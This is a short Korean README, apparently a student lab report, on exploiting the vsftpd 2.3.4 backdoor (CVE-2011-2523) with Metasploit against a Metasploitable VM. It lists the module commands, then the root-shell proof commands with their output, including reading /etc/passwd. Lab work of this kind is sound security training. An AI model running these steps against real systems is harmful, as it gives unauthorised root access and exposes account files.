
vsftpd 2.3.4 (CVE-2011-2523)의 취약점 평가 및 Metasploit을 사용한 익스플로잇. 전체 보고서 및 루트 액세스 증거 포함.
Metasploit을 사용한
vsftpd 2.3.4의 알려진 취약점 악용
192.168.150.133exploit/unix/ftp/vsftpd_234_backdoorvsftpd 2.3.4에는 특수하게 조작된 사용자 이름(:)로 끝나는)이 수신될 때 포트 6200에서 명령 셸을 여는 악성 백도어가 포함되어 있습니다.
CVE: CVE-2011-2523
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run
whoami
> root
id
> uid=0(root) gid=0(root)
hostname
> metasploitable
uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...
cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
루트 셸 액세스로 공격자는 대상 시스템에 대한 완전한 제어권을 얻습니다. 여기에는 권한 상승, 측면 이동, 데이터 유출, 지속적인 접근 유지 등이 포함됩니다.
📝 전체 PDF 보고서는 이 저장소에 있습니다: vsftpd-exploit-report.pdf
🔥 by vedpakhare 제작